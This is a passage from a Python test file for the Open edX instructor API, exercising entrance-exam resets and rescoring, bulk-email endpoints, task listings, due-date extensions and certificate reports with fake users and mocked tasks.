CourseEnrollment.enroll(self.student, self.course.id)
ee_module_to_reset1 = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.ee_problem_1.location,
state=json.dumps({'attempts': 10, 'done': True}),
)
ee_module_to_reset2 = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.ee_problem_2.location,
state=json.dumps({'attempts': 10, 'done': True}),
)
self.ee_modules = [ee_module_to_reset1.module_state_key, ee_module_to_reset2.module_state_key]
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_grade_histogram(self, store):
"""
Verify that a histogram has been created.
"""
course = CourseFactory.create(default_store=store)
usage_key = course.id.make_usage_key('problem', 'first_problem')
StudentModule.objects.create(
student_id=1,
grade=100,
module_state_key=usage_key
)
StudentModule.objects.create(
student_id=2,
grade=50,
module_state_key=usage_key
)
grades = grade_histogram(usage_key)
assert grades[0] == (50.0, 1)
assert grades[1] == (100.0, 1)
def test_reset_entrance_exam_student_attempts_delete_all(self):
""" Make sure no one can delete all students state on entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
'delete_module': True,
})
assert response.status_code == 400
def test_reset_entrance_exam_student_attempts_single(self):
""" Test reset single student attempts for entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# make sure problem attempts have been reset.
changed_modules = StudentModule.objects.filter(module_state_key__in=self.ee_modules)
for changed_module in changed_modules:
assert json.loads(changed_module.state)['attempts'] == 0
# mock out the function which should be called to execute the action.
@patch('lms.djangoapps.instructor_task.api.submit_reset_problem_attempts_in_entrance_exam')
def test_reset_entrance_exam_all_student_attempts(self, act):
""" Test reset all student attempts for entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
})
assert response.status_code == 200
assert act.called
def test_reset_student_attempts_invalid_entrance_exam(self):
""" Test reset for invalid entrance exam. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course_with_invalid_ee.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
def test_entrance_exam_student_delete_state(self):
""" Test delete single student entrance exam state. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'delete_module': True,
})
assert response.status_code == 200
# make sure the module has been deleted
changed_modules = StudentModule.objects.filter(module_state_key__in=self.ee_modules)
assert changed_modules.count() == 0
def test_entrance_exam_delete_state_with_staff(self):
""" Test entrance exam delete state failure with staff access. """
self.client.logout()
staff_user = StaffFactory(course_key=self.course.id)
self.client.login(username=staff_user.username, password='test')
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'delete_module': True,
})
assert response.status_code == 403
def test_entrance_exam_reset_student_attempts_nonsense(self):
""" Test failure with both unique_student_identifier and all_students. """
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'all_students': True,
})
assert response.status_code == 400
@patch('lms.djangoapps.instructor_task.api.submit_rescore_entrance_exam_for_student')
def test_rescore_entrance_exam_single_student(self, act):
""" Test re-scoring of entrance exam for single student. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
assert act.called
def test_rescore_entrance_exam_all_student(self):
""" Test rescoring for all students. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
})
assert response.status_code == 200
def test_rescore_entrance_exam_if_higher_all_student(self):
""" Test rescoring for all students only if higher. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
'only_if_higher': True,
})
assert response.status_code == 200
def test_rescore_entrance_exam_all_student_and_single(self):
""" Test re-scoring with both all students and single student parameters. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
'all_students': True,
})
assert response.status_code == 400
def test_rescore_entrance_exam_with_invalid_exam(self):
""" Test re-scoring of entrance exam with invalid exam. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course_with_invalid_ee.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
def test_list_entrance_exam_instructor_tasks_student(self):
""" Test list task history for entrance exam AND student. """
# create a re-score entrance exam task
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
url = reverse('list_entrance_exam_instructor_tasks', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# check response
tasks = json.loads(response.content.decode('utf-8'))['tasks']
assert len(tasks) == 1
assert tasks[0]['status'] == _('Complete')
def test_list_entrance_exam_instructor_tasks_all_student(self):
""" Test list task history for entrance exam AND all student. """
url = reverse('list_entrance_exam_instructor_tasks', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
assert response.status_code == 200
# check response
tasks = json.loads(response.content.decode('utf-8'))['tasks']
assert len(tasks) == 0
def test_list_entrance_exam_instructor_with_invalid_exam_key(self):
""" Test list task history for entrance exam failure if course has invalid exam. """
url = reverse('list_entrance_exam_instructor_tasks',
kwargs={'course_id': str(self.course_with_invalid_ee.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
def test_skip_entrance_exam_student(self):
""" Test skip entrance exam api for student. """
# create a re-score entrance exam task
url = reverse('mark_student_can_skip_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# check response
message = _('This student (%s) will skip the entrance exam.') % self.student.email
self.assertContains(response, message)
# post again with same student
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
# This time response message should be different
message = _('This student (%s) is already allowed to skip the entrance exam.') % self.student.email
self.assertContains(response, message)
@patch('lms.djangoapps.bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message', autospec=True)) # lint-amnesty, pylint: disable=line-too-long
class TestInstructorSendEmail(SiteMixin, SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Checks that only instructors have access to email endpoints, and that
these endpoints are only accessible with courses that actually exist,
only with valid email messages.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
test_subject = '\u1234 test subject'
test_message = '\u6824 test message'
cls.full_test_message = {
'send_to': '["myself", "staff"]',
'subject': test_subject,
'message': test_message,
}
BulkEmailFlag.objects.create(enabled=True, require_course_email_auth=False)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
BulkEmailFlag.objects.all().delete()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
def test_send_email_as_logged_in_instructor(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 200
def test_send_email_but_not_logged_in(self):
self.client.logout()
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 403
def test_send_email_but_not_staff(self):
self.client.logout()
student = UserFactory()
self.client.login(username=student.username, password='test')
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 403
def test_send_email_but_course_not_exist(self):
url = reverse('send_email', kwargs={'course_id': 'GarbageCourse/DNE/NoTerm'})
response = self.client.post(url, self.full_test_message)
assert response.status_code != 200
def test_send_email_no_sendto(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'subject': 'test subject',
'message': 'test message',
})
assert response.status_code == 400
def test_send_email_invalid_sendto(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'send_to': '["invalid_target", "staff"]',
'subject': 'test subject',
'message': 'test message',
})
assert response.status_code == 400
def test_send_email_no_subject(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'send_to': '["staff"]',
'message': 'test message',
})
assert response.status_code == 400
def test_send_email_no_message(self):
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'send_to': '["staff"]',
'subject': 'test subject',
})
assert response.status_code == 400
def test_send_email_with_site_template_and_from_addr(self):
site_email = self.site_configuration.site_values.get('course_email_from_addr')
site_template = self.site_configuration.site_values.get('course_email_template_name')
CourseEmailTemplate.objects.create(name=site_template)
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 200
assert 1 == CourseEmail.objects.filter(course_id=self.course.id, sender=self.instructor,
subject=self.full_test_message['subject'],
html_message=self.full_test_message['message'],
template_name=site_template, from_addr=site_email).count()
def test_send_email_with_org_template_and_from_addr(self):
org_email = 'fake_org@example.com'
org_template = 'fake_org_email_template'
CourseEmailTemplate.objects.create(name=org_template)
self.site_configuration.site_values.update({
'course_email_from_addr': {self.course.id.org: org_email},
'course_email_template_name': {self.course.id.org: org_template}
})
self.site_configuration.save()
url = reverse('send_email', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, self.full_test_message)
assert response.status_code == 200
assert 1 == CourseEmail.objects.filter(course_id=self.course.id, sender=self.instructor,
subject=self.full_test_message['subject'],
html_message=self.full_test_message['message'],
template_name=org_template, from_addr=org_email).count()
class MockCompletionInfo:
"""Mock for get_task_completion_info"""
times_called = 0
def mock_get_task_completion_info(self, *args): # pylint: disable=unused-argument
"""Mock for get_task_completion_info"""
self.times_called += 1
if self.times_called % 2 == 0:
return True, 'Task Completed'
return False, 'Task Errored In Some Way'
class TestInstructorAPITaskLists(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test instructor task list endpoint.
"""
class FakeTask:
""" Fake task object """
FEATURES = [
'task_type',
'task_input',
'task_id',
'requester',
'task_state',
'created',
'status',
'task_message',
'duration_sec'
]
def __init__(self, completion):
for feature in self.FEATURES:
setattr(self, feature, 'expected')
# created needs to be a datetime
self.created = datetime.datetime(2013, 10, 25, 11, 42, 35)
# set 'status' and 'task_message' attrs
success, task_message = completion()
if success:
self.status = "Complete"
else:
self.status = "Incomplete"
self.task_message = task_message
# Set 'task_output' attr, which will be parsed to the 'duration_sec' attr.
self.task_output = '{"duration_ms": 1035000}'
self.duration_sec = 1035000 / 1000.0
def make_invalid_output(self):
"""Munge task_output to be invalid json"""
self.task_output = 'HI MY NAME IS INVALID JSON'
# This should be given the value of 'unknown' if the task output
# can't be properly parsed
self.duration_sec = 'unknown'
def to_dict(self):
""" Convert fake task to dictionary representation. """
attr_dict = {key: getattr(self, key) for key in self.FEATURES}
attr_dict['created'] = attr_dict['created'].isoformat()
return attr_dict
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create(
entrance_exam_id='i4x://{}/{}/chapter/Entrance_exam'.format('test_org', 'test_course')
)
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.problem_urlname = str(cls.problem_location)
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.module = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 10}),
)
mock_factory = MockCompletionInfo()
self.tasks = [self.FakeTask(mock_factory.mock_get_task_completion_info) for _ in range(7)]
self.tasks[-1].make_invalid_output()
@patch('lms.djangoapps.instructor_task.api.get_running_instructor_tasks')
def test_list_instructor_tasks_running(self, act):
""" Test list of all running tasks. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history')
def test_list_background_email_tasks(self, act):
"""Test list of background email tasks."""
act.return_value = self.tasks
url = reverse('list_background_email_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history')
def test_list_instructor_tasks_problem(self, act):
""" Test list task history for problem. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {
'problem_location_str': self.problem_urlname,
})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history')
def test_list_instructor_tasks_problem_student(self, act):
""" Test list task history for problem AND student. """
act.return_value = self.tasks
url = reverse('list_instructor_tasks', kwargs={'course_id': str(self.course.id)})
mock_factory = MockCompletionInfo()
with patch(
'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info'
) as mock_completion_info:
mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info
response = self.client.post(url, {
'problem_location_str': self.problem_urlname,
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# check response
assert act.called
expected_tasks = [ftask.to_dict() for ftask in self.tasks]
actual_tasks = json.loads(response.content.decode('utf-8'))['tasks']
for exp_task, act_task in zip(expected_tasks, actual_tasks):
self.assertDictEqual(exp_task, act_task)
assert actual_tasks == expected_tasks
@patch('lms.djangoapps.instructor_task.api.get_instructor_task_history', autospec=True)
class TestInstructorEmailContentList(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test the instructor email content history endpoint.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.tasks = {}
self.emails = {}
self.emails_info = {}
def setup_fake_email_info(self, num_emails, with_failures=False):
""" Initialize the specified number of fake emails """
for email_id in range(num_emails):
num_sent = random.randint(1, 15401)
if with_failures:
failed = random.randint(1, 15401)
else:
failed = 0
self.tasks[email_id] = FakeContentTask(email_id, num_sent, failed, 'expected')
self.emails[email_id] = FakeEmail(email_id)
self.emails_info[email_id] = FakeEmailInfo(self.emails[email_id], num_sent, failed)
def get_matching_mock_email(self, **kwargs):
""" Returns the matching mock emails for the given id """
email_id = kwargs.get('id', 0)
return self.emails[email_id]
def get_email_content_response(self, num_emails, task_history_request, with_failures=False):
""" Calls the list_email_content endpoint and returns the repsonse """
self.setup_fake_email_info(num_emails, with_failures)
task_history_request.return_value = list(self.tasks.values())
url = reverse('list_email_content', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor.views.api.CourseEmail.objects.get') as mock_email_info:
mock_email_info.side_effect = self.get_matching_mock_email
response = self.client.post(url, {})
assert response.status_code == 200
return response
def check_emails_sent(self, num_emails, task_history_request, with_failures=False):
""" Tests sending emails with or without failures """
response = self.get_email_content_response(num_emails, task_history_request, with_failures)
assert task_history_request.called
expected_email_info = [email_info.to_dict() for email_info in self.emails_info.values()]
actual_email_info = json.loads(response.content.decode('utf-8'))['emails']
assert len(actual_email_info) == num_emails
for exp_email, act_email in zip(expected_email_info, actual_email_info):
self.assertDictEqual(exp_email, act_email)
assert expected_email_info == actual_email_info
def test_content_list_one_email(self, task_history_request):
""" Test listing of bulk emails when email list has one email """
response = self.get_email_content_response(1, task_history_request)
assert task_history_request.called
email_info = json.loads(response.content.decode('utf-8'))['emails']
# Emails list should have one email
assert len(email_info) == 1
# Email content should be what's expected
expected_message = self.emails[0].html_message
returned_email_info = email_info[0]
received_message = returned_email_info['email']['html_message']
assert expected_message == received_message
def test_content_list_no_emails(self, task_history_request):
""" Test listing of bulk emails when email list empty """
response = self.get_email_content_response(0, task_history_request)
assert task_history_request.called
email_info = json.loads(response.content.decode('utf-8'))['emails']
# Emails list should be empty
assert len(email_info) == 0
def test_content_list_email_content_many(self, task_history_request):
""" Test listing of bulk emails sent large amount of emails """
self.check_emails_sent(50, task_history_request)
def test_list_email_content_error(self, task_history_request):
""" Test handling of error retrieving email """
invalid_task = FakeContentTask(0, 0, 0, 'test')
invalid_task.make_invalid_input()
task_history_request.return_value = [invalid_task]
url = reverse('list_email_content', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
assert response.status_code == 200
assert task_history_request.called
returned_email_info = json.loads(response.content.decode('utf-8'))['emails']
assert len(returned_email_info) == 1
returned_info = returned_email_info[0]
for info in ['created', 'sent_to', 'email', 'number_sent', 'requester']:
assert returned_info[info] is None
def test_list_email_with_failure(self, task_history_request):
""" Test the handling of email task that had failures """
self.check_emails_sent(1, task_history_request, True)
def test_list_many_emails_with_failures(self, task_history_request):
""" Test the handling of many emails with failures """
self.check_emails_sent(50, task_history_request, True)
def test_list_email_with_no_successes(self, task_history_request):
task_info = FakeContentTask(0, 0, 10, 'expected')
email = FakeEmail(0)
email_info = FakeEmailInfo(email, 0, 10)
task_history_request.return_value = [task_info]
url = reverse('list_email_content', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor.views.api.CourseEmail.objects.get') as mock_email_info:
mock_email_info.return_value = email
response = self.client.post(url, {})
assert response.status_code == 200
assert task_history_request.called
returned_info_list = json.loads(response.content.decode('utf-8'))['emails']
assert len(returned_info_list) == 1
returned_info = returned_info_list[0]
expected_info = email_info.to_dict()
self.assertDictEqual(expected_info, returned_info)
class TestInstructorAPIHelpers(TestCase):
""" Test helpers for instructor.api """
def test_split_input_list(self):
strings = []
lists = []
strings.append(
"Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed")
lists.append(['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus',
'ut@lacinia.Sed'])
for (stng, lst) in zip(strings, lists):
assert _split_input_list(stng) == lst
def test_split_input_list_unicode(self):
assert _split_input_list('robot@robot.edu, robot2@robot.edu') == ['robot@robot.edu', 'robot2@robot.edu']
assert _split_input_list('robot@robot.edu, robot2@robot.edu') == ['robot@robot.edu', 'robot2@robot.edu']
assert _split_input_list('robot@robot.edu, robot2@robot.edu') == ['robot@robot.edu', 'robot2@robot.edu']
scary_unistuff = chr(40960) + 'abcd' + chr(1972)
assert _split_input_list(scary_unistuff) == [scary_unistuff]
def test_msk_from_problem_urlname(self):
course_id = CourseKey.from_string('MITx/6.002x/2013_Spring')
name = 'L2Node1'
output = 'i4x://MITx/6.002x/problem/L2Node1'
assert str(msk_from_problem_urlname(course_id, name)) == output
def test_msk_from_problem_urlname_error(self):
args = ('notagoodcourse', 'L2Node1')
with pytest.raises(ValueError):
msk_from_problem_urlname(*args)
def get_extended_due(course, unit, user):
"""
Gets the overridden due date for the given user on the given unit. Returns
`None` if there is no override set.
"""
location = str(unit.location)
dates = get_overrides_for_user(course.id, user)
for override in dates:
if str(override['location']) == location:
return override['actual_date']
return None
def get_date_for_block(course, unit, user):
"""
Gets the due date for the given user on the given unit (overridden or original).
Returns `None` if there is no date set.
(Differs from edx-when's get_date_for_block only in that we skip the cache.
"""
return get_dates_for_course(course.id, user=user, use_cached=False).get((unit.location, 'due'), None)
class TestDueDateExtensions(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test data dumps for reporting.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
cls.due = datetime.datetime(2010, 5, 12, 2, 42, tzinfo=UTC)
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
cls.week1 = ItemFactory.create(due=cls.due)
cls.week2 = ItemFactory.create(due=cls.due)
cls.week3 = ItemFactory.create() # No due date
cls.course.children = [
str(cls.week1.location),
str(cls.week2.location),
str(cls.week3.location)
]
cls.homework = ItemFactory.create(
parent_location=cls.week1.location,
due=cls.due
)
cls.week1.children = [str(cls.homework.location)]
def setUp(self):
"""
Fixtures.
"""
super().setUp()
user1 = UserFactory.create()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week2.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week3.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user2 = UserFactory.create()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user3 = UserFactory.create()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
self.user1 = user1
self.user2 = user2
CourseEnrollmentFactory.create(user=self.user1, course_id=self.course.id)
CourseEnrollmentFactory.create(user=self.user2, course_id=self.course.id)
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
extract_dates(None, self.course.id)
def test_change_due_date(self):
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
'due_datetime': '12/30/2013 00:00'
})
assert response.status_code == 200, response.content
assert datetime.datetime(2013, 12, 30, 0, 0, tzinfo=UTC) ==\
get_extended_due(self.course, self.week1, self.user1)
def test_change_to_invalid_due_date(self):
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
'due_datetime': '01/01/2009 00:00'
})
assert response.status_code == 400, response.content
assert get_extended_due(self.course, self.week1, self.user1) is None
def test_change_nonexistent_due_date(self):
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week3.location),
'due_datetime': '12/30/2013 00:00'
})
assert response.status_code == 400, response.content
assert get_extended_due(self.course, self.week3, self.user1) is None
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_date(self):
self.test_change_due_date()
url = reverse('reset_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
})
assert response.status_code == 200, response.content
assert self.due == get_extended_due(self.course, self.week1, self.user1)
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_date_only_in_edx_when(self):
# Start with a unit that only has a date in edx-when
assert get_date_for_block(self.course, self.week3, self.user1) is None
original_due = datetime.datetime(2010, 4, 1, tzinfo=UTC)
set_date_for_block(self.course.id, self.week3.location, 'due', original_due)
assert get_date_for_block(self.course, self.week3, self.user1) == original_due
# set override, confirm it took
override = datetime.datetime(2010, 7, 1, tzinfo=UTC)
set_date_for_block(self.course.id, self.week3.location, 'due', override, user=self.user1)
assert get_date_for_block(self.course, self.week3, self.user1) == override
# Now test that we noticed the edx-when date
url = reverse('reset_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week3.location),
})
self.assertContains(response, 'Successfully reset due date for student')
assert get_date_for_block(self.course, self.week3, self.user1) == original_due
def test_show_unit_extensions(self):
self.test_change_due_date()
url = reverse('show_unit_extensions',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'url': str(self.week1.location)})
assert response.status_code == 200, response.content
assert json.loads(response.content.decode('utf-8')) ==\
{u'data': [{'Extended Due Date': '2013-12-30 00:00',
'Full Name': self.user1.profile.name, 'Username': self.user1.username}],
u'header': ['Username', 'Full Name', 'Extended Due Date'],
u'title': ('Users with due date extensions for %s' % self.week1.display_name)}
def test_show_student_extensions(self):
self.test_change_due_date()
url = reverse('show_student_extensions',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'student': self.user1.username})
assert response.status_code == 200, response.content
assert json.loads(response.content.decode('utf-8')) ==\
{'data': [{'Extended Due Date': '2013-12-30 00:00', 'Unit': self.week1.display_name}],
'header': ['Unit', 'Extended Due Date'],
'title': ('Due date extensions for %s (%s)' % (self.user1.profile.name, self.user1.username))}
class TestDueDateExtensionsDeletedDate(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Tests for deleting due date extensions
"""
def setUp(self):
"""
Fixtures.
"""
super().setUp()
self.course = CourseFactory.create()
self.due = datetime.datetime(2010, 5, 12, 2, 42, tzinfo=UTC)
with self.store.bulk_operations(self.course.id, emit_signals=False):
self.week1 = ItemFactory.create(due=self.due)
self.week2 = ItemFactory.create(due=self.due)
self.week3 = ItemFactory.create() # No due date
self.course.children = [
str(self.week1.location),
str(self.week2.location),
str(self.week3.location)
]
self.homework = ItemFactory.create(
parent_location=self.week1.location,
due=self.due
)
self.week1.children = [str(self.homework.location)]
user1 = UserFactory.create()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week2.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week3.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user2 = UserFactory.create()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user3 = UserFactory.create()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
self.user1 = user1
self.user2 = user2
CourseEnrollmentFactory.create(user=self.user1, course_id=self.course.id)
CourseEnrollmentFactory.create(user=self.user2, course_id=self.course.id)
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
extract_dates(None, self.course.id)
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_extension_to_deleted_date(self):
"""
Test that we can delete a due date extension after deleting the normal
due date, without causing an error.
"""
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
'due_datetime': '12/30/2013 00:00'
})
assert response.status_code == 200, response.content
assert datetime.datetime(2013, 12, 30, 0, 0, tzinfo=UTC) ==\
get_extended_due(self.course, self.week1, self.user1)
self.week1.due = None
self.week1 = self.store.update_item(self.week1, self.user1.id)
extract_dates(None, self.course.id)
# Now, week1's normal due date is deleted but the extension still exists.
url = reverse('reset_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
})
assert response.status_code == 200, response.content
assert self.due == get_extended_due(self.course, self.week1, self.user1)
class TestCourseIssuedCertificatesData(SharedModuleStoreTestCase):
"""
Test data dumps for issued certificates.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
def generate_certificate(self, course_id, mode, status):
"""
Generate test certificate
"""
test_user = UserFactory()
GeneratedCertificateFactory.create(
user=test_user,
course_id=course_id,
mode=mode,
status=status
)
def test_certificates_features_against_status(self):
"""
Test certificates with status 'downloadable' should be in the response.
"""
url = reverse('get_issued_certificates', kwargs={'course_id': str(self.course.id)})
# firstly generating downloadable certificates with 'honor' mode
certificate_count = 3
for __ in range(certificate_count):
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.generating)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
assert 'certificates' in res_json
assert len(res_json['certificates']) == 0
# Certificates with status 'downloadable' should be in response.
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.downloadable)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
